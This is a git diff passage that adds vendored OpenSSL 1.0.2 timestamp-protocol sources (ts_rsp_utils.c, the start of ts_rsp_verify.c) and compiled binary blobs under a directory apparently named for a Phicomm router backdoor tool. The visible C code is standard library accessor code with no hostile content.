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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_utils.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_utils.c
new file mode 100644
index 0000000..f6f6332
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_utils.c
@@ -0,0 +1,396 @@
+/* crypto/ts/ts_resp_utils.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/ts.h>
+#include <openssl/pkcs7.h>
+
+/* Function definitions. */
+
+int TS_RESP_set_status_info(TS_RESP *a, TS_STATUS_INFO *status_info)
+{
+    TS_STATUS_INFO *new_status_info;
+
+    if (a->status_info == status_info)
+        return 1;
+    new_status_info = TS_STATUS_INFO_dup(status_info);
+    if (new_status_info == NULL) {
+        TSerr(TS_F_TS_RESP_SET_STATUS_INFO, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    TS_STATUS_INFO_free(a->status_info);
+    a->status_info = new_status_info;
+
+    return 1;
+}
+
+TS_STATUS_INFO *TS_RESP_get_status_info(TS_RESP *a)
+{
+    return a->status_info;
+}
+
+/* Caller loses ownership of PKCS7 and TS_TST_INFO objects. */
+void TS_RESP_set_tst_info(TS_RESP *a, PKCS7 *p7, TS_TST_INFO *tst_info)
+{
+    /* Set new PKCS7 and TST_INFO objects. */
+    PKCS7_free(a->token);
+    a->token = p7;
+    TS_TST_INFO_free(a->tst_info);
+    a->tst_info = tst_info;
+}
+
+PKCS7 *TS_RESP_get_token(TS_RESP *a)
+{
+    return a->token;
+}
+
+TS_TST_INFO *TS_RESP_get_tst_info(TS_RESP *a)
+{
+    return a->tst_info;
+}
+
+int TS_TST_INFO_set_version(TS_TST_INFO *a, long version)
+{
+    return ASN1_INTEGER_set(a->version, version);
+}
+
+long TS_TST_INFO_get_version(const TS_TST_INFO *a)
+{
+    return ASN1_INTEGER_get(a->version);
+}
+
+int TS_TST_INFO_set_policy_id(TS_TST_INFO *a, ASN1_OBJECT *policy)
+{
+    ASN1_OBJECT *new_policy;
+
+    if (a->policy_id == policy)
+        return 1;
+    new_policy = OBJ_dup(policy);
+    if (new_policy == NULL) {
+        TSerr(TS_F_TS_TST_INFO_SET_POLICY_ID, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ASN1_OBJECT_free(a->policy_id);
+    a->policy_id = new_policy;
+    return 1;
+}
+
+ASN1_OBJECT *TS_TST_INFO_get_policy_id(TS_TST_INFO *a)
+{
+    return a->policy_id;
+}
+
+int TS_TST_INFO_set_msg_imprint(TS_TST_INFO *a, TS_MSG_IMPRINT *msg_imprint)
+{
+    TS_MSG_IMPRINT *new_msg_imprint;
+
+    if (a->msg_imprint == msg_imprint)
+        return 1;
+    new_msg_imprint = TS_MSG_IMPRINT_dup(msg_imprint);
+    if (new_msg_imprint == NULL) {
+        TSerr(TS_F_TS_TST_INFO_SET_MSG_IMPRINT, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    TS_MSG_IMPRINT_free(a->msg_imprint);
+    a->msg_imprint = new_msg_imprint;
+    return 1;
+}
+
+TS_MSG_IMPRINT *TS_TST_INFO_get_msg_imprint(TS_TST_INFO *a)
+{
+    return a->msg_imprint;
+}
+
+int TS_TST_INFO_set_serial(TS_TST_INFO *a, const ASN1_INTEGER *serial)
+{
+    ASN1_INTEGER *new_serial;
+
+    if (a->serial == serial)
+        return 1;
+    new_serial = ASN1_INTEGER_dup(serial);
+    if (new_serial == NULL) {
+        TSerr(TS_F_TS_TST_INFO_SET_SERIAL, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ASN1_INTEGER_free(a->serial);
+    a->serial = new_serial;
+    return 1;
+}
+
+const ASN1_INTEGER *TS_TST_INFO_get_serial(const TS_TST_INFO *a)
+{
+    return a->serial;
+}
+
+int TS_TST_INFO_set_time(TS_TST_INFO *a, const ASN1_GENERALIZEDTIME *gtime)
+{
+    ASN1_GENERALIZEDTIME *new_time;
+
+    if (a->time == gtime)
+        return 1;
+    new_time = M_ASN1_GENERALIZEDTIME_dup(gtime);
+    if (new_time == NULL) {
+        TSerr(TS_F_TS_TST_INFO_SET_TIME, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ASN1_GENERALIZEDTIME_free(a->time);
+    a->time = new_time;
+    return 1;
+}
+
+const ASN1_GENERALIZEDTIME *TS_TST_INFO_get_time(const TS_TST_INFO *a)
+{
+    return a->time;
+}
+
+int TS_TST_INFO_set_accuracy(TS_TST_INFO *a, TS_ACCURACY *accuracy)
+{
+    TS_ACCURACY *new_accuracy;
+
+    if (a->accuracy == accuracy)
+        return 1;
+    new_accuracy = TS_ACCURACY_dup(accuracy);
+    if (new_accuracy == NULL) {
+        TSerr(TS_F_TS_TST_INFO_SET_ACCURACY, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    TS_ACCURACY_free(a->accuracy);
+    a->accuracy = new_accuracy;
+    return 1;
+}
+
+TS_ACCURACY *TS_TST_INFO_get_accuracy(TS_TST_INFO *a)
+{
+    return a->accuracy;
+}
+
+int TS_ACCURACY_set_seconds(TS_ACCURACY *a, const ASN1_INTEGER *seconds)
+{
+    ASN1_INTEGER *new_seconds;
+
+    if (a->seconds == seconds)
+        return 1;
+    new_seconds = ASN1_INTEGER_dup(seconds);
+    if (new_seconds == NULL) {
+        TSerr(TS_F_TS_ACCURACY_SET_SECONDS, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ASN1_INTEGER_free(a->seconds);
+    a->seconds = new_seconds;
+    return 1;
+}
+
+const ASN1_INTEGER *TS_ACCURACY_get_seconds(const TS_ACCURACY *a)
+{
+    return a->seconds;
+}
+
+int TS_ACCURACY_set_millis(TS_ACCURACY *a, const ASN1_INTEGER *millis)
+{
+    ASN1_INTEGER *new_millis = NULL;
+
+    if (a->millis == millis)
+        return 1;
+    if (millis != NULL) {
+        new_millis = ASN1_INTEGER_dup(millis);
+        if (new_millis == NULL) {
+            TSerr(TS_F_TS_ACCURACY_SET_MILLIS, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    }
+    ASN1_INTEGER_free(a->millis);
+    a->millis = new_millis;
+    return 1;
+}
+
+const ASN1_INTEGER *TS_ACCURACY_get_millis(const TS_ACCURACY *a)
+{
+    return a->millis;
+}
+
+int TS_ACCURACY_set_micros(TS_ACCURACY *a, const ASN1_INTEGER *micros)
+{
+    ASN1_INTEGER *new_micros = NULL;
+
+    if (a->micros == micros)
+        return 1;
+    if (micros != NULL) {
+        new_micros = ASN1_INTEGER_dup(micros);
+        if (new_micros == NULL) {
+            TSerr(TS_F_TS_ACCURACY_SET_MICROS, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    }
+    ASN1_INTEGER_free(a->micros);
+    a->micros = new_micros;
+    return 1;
+}
+
+const ASN1_INTEGER *TS_ACCURACY_get_micros(const TS_ACCURACY *a)
+{
+    return a->micros;
+}
+
+int TS_TST_INFO_set_ordering(TS_TST_INFO *a, int ordering)
+{
+    a->ordering = ordering ? 0xFF : 0x00;
+    return 1;
+}
+
+int TS_TST_INFO_get_ordering(const TS_TST_INFO *a)
+{
+    return a->ordering ? 1 : 0;
+}
+
+int TS_TST_INFO_set_nonce(TS_TST_INFO *a, const ASN1_INTEGER *nonce)
+{
+    ASN1_INTEGER *new_nonce;
+
+    if (a->nonce == nonce)
+        return 1;
+    new_nonce = ASN1_INTEGER_dup(nonce);
+    if (new_nonce == NULL) {
+        TSerr(TS_F_TS_TST_INFO_SET_NONCE, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    ASN1_INTEGER_free(a->nonce);
+    a->nonce = new_nonce;
+    return 1;
+}
+
+const ASN1_INTEGER *TS_TST_INFO_get_nonce(const TS_TST_INFO *a)
+{
+    return a->nonce;
+}
+
+int TS_TST_INFO_set_tsa(TS_TST_INFO *a, GENERAL_NAME *tsa)
+{
+    GENERAL_NAME *new_tsa;
+
+    if (a->tsa == tsa)
+        return 1;
+    new_tsa = GENERAL_NAME_dup(tsa);
+    if (new_tsa == NULL) {
+        TSerr(TS_F_TS_TST_INFO_SET_TSA, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    GENERAL_NAME_free(a->tsa);
+    a->tsa = new_tsa;
+    return 1;
+}
+
+GENERAL_NAME *TS_TST_INFO_get_tsa(TS_TST_INFO *a)
+{
+    return a->tsa;
+}
+
+STACK_OF(X509_EXTENSION) *TS_TST_INFO_get_exts(TS_TST_INFO *a)
+{
+    return a->extensions;
+}
+
+void TS_TST_INFO_ext_free(TS_TST_INFO *a)
+{
+    if (!a)
+        return;
+    sk_X509_EXTENSION_pop_free(a->extensions, X509_EXTENSION_free);
+    a->extensions = NULL;
+}
+
+int TS_TST_INFO_get_ext_count(TS_TST_INFO *a)
+{
+    return X509v3_get_ext_count(a->extensions);
+}
+
+int TS_TST_INFO_get_ext_by_NID(TS_TST_INFO *a, int nid, int lastpos)
+{
+    return X509v3_get_ext_by_NID(a->extensions, nid, lastpos);
+}
+
+int TS_TST_INFO_get_ext_by_OBJ(TS_TST_INFO *a, ASN1_OBJECT *obj, int lastpos)
+{
+    return X509v3_get_ext_by_OBJ(a->extensions, obj, lastpos);
+}
+
+int TS_TST_INFO_get_ext_by_critical(TS_TST_INFO *a, int crit, int lastpos)
+{
+    return X509v3_get_ext_by_critical(a->extensions, crit, lastpos);
+}
+
+X509_EXTENSION *TS_TST_INFO_get_ext(TS_TST_INFO *a, int loc)
+{
+    return X509v3_get_ext(a->extensions, loc);
+}
+
+X509_EXTENSION *TS_TST_INFO_delete_ext(TS_TST_INFO *a, int loc)
+{
+    return X509v3_delete_ext(a->extensions, loc);
+}
+
+int TS_TST_INFO_add_ext(TS_TST_INFO *a, X509_EXTENSION *ex, int loc)
+{
+    return X509v3_add_ext(&a->extensions, ex, loc) != NULL;
+}
+
+void *TS_TST_INFO_get_ext_d2i(TS_TST_INFO *a, int nid, int *crit, int *idx)
+{
+    return X509V3_get_d2i(a->extensions, nid, crit, idx);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_utils.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_utils.o
new file mode 100644
index 0000000000000000000000000000000000000000..fec24b727c9df2565fac3ea065dd85fc4584a504
GIT binary patch
literal 8936
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
Uz3c9Yb@uHyxf&C!NTq839~5j{*#H0l

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_verify.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_verify.c
new file mode 100644
index 0000000..3ce765d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_verify.c
@@ -0,0 +1,736 @@
+/* crypto/ts/ts_resp_verify.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/ts.h>
+#include <openssl/pkcs7.h>
+
+/* Private function declarations. */
+
+static int TS_verify_cert(X509_STORE *store, STACK_OF(X509) *untrusted,
+                          X509 *signer, STACK_OF(X509) **chain);
+static int TS_check_signing_certs(PKCS7_SIGNER_INFO *si,
+                                  STACK_OF(X509) *chain);
+static ESS_SIGNING_CERT *ESS_get_signing_cert(PKCS7_SIGNER_INFO *si);
+static int TS_find_cert(STACK_OF(ESS_CERT_ID) *cert_ids, X509 *cert);
+static int TS_issuer_serial_cmp(ESS_ISSUER_SERIAL *is, X509_CINF *cinfo);
+static int int_TS_RESP_verify_token(TS_VERIFY_CTX *ctx,
+                                    PKCS7 *token, TS_TST_INFO *tst_info);
+static int TS_check_status_info(TS_RESP *response);
+static char *TS_get_status_text(STACK_OF(ASN1_UTF8STRING) *text);
+static int TS_check_policy(ASN1_OBJECT *req_oid, TS_TST_INFO *tst_info);
+static int TS_compute_imprint(BIO *data, TS_TST_INFO *tst_info,
+                              X509_ALGOR **md_alg,
+                              unsigned char **imprint, unsigned *imprint_len);
+static int TS_check_imprints(X509_ALGOR *algor_a,
+                             unsigned char *imprint_a, unsigned len_a,
+                             TS_TST_INFO *tst_info);
+static int TS_check_nonces(const ASN1_INTEGER *a, TS_TST_INFO *tst_info);
+static int TS_check_signer_name(GENERAL_NAME *tsa_name, X509 *signer);
+static int TS_find_name(STACK_OF(GENERAL_NAME) *gen_names,
+                        GENERAL_NAME *name);
+
+/*
+ * Local mapping between response codes and descriptions.
+ * Don't forget to change TS_STATUS_BUF_SIZE when modifying
+ * the elements of this array.
+ */
+static const char *TS_status_text[] = { "granted",
+    "grantedWithMods",
+    "rejection",
+    "waiting",
+    "revocationWarning",
+    "revocationNotification"
+};
+
+#define TS_STATUS_TEXT_SIZE     (sizeof(TS_status_text)/sizeof(*TS_status_text))
+
+/*
+ * This must be greater or equal to the sum of the strings in TS_status_text
+ * plus the number of its elements.
+ */
+#define TS_STATUS_BUF_SIZE      256
+
+static struct {
+    int code;
+    const char *text;
+} TS_failure_info[] = {
+    {
+        TS_INFO_BAD_ALG, "badAlg"
+    },
+    {
+        TS_INFO_BAD_REQUEST, "badRequest"
+    },
+    {
+        TS_INFO_BAD_DATA_FORMAT, "badDataFormat"
+    },
+    {
+        TS_INFO_TIME_NOT_AVAILABLE, "timeNotAvailable"
+    },
+    {
+        TS_INFO_UNACCEPTED_POLICY, "unacceptedPolicy"
+    },
+    {
+        TS_INFO_UNACCEPTED_EXTENSION, "unacceptedExtension"
+    },
+    {
+        TS_INFO_ADD_INFO_NOT_AVAILABLE, "addInfoNotAvailable"
+    },
+    {
+        TS_INFO_SYSTEM_FAILURE, "systemFailure"
+    }
+};
+
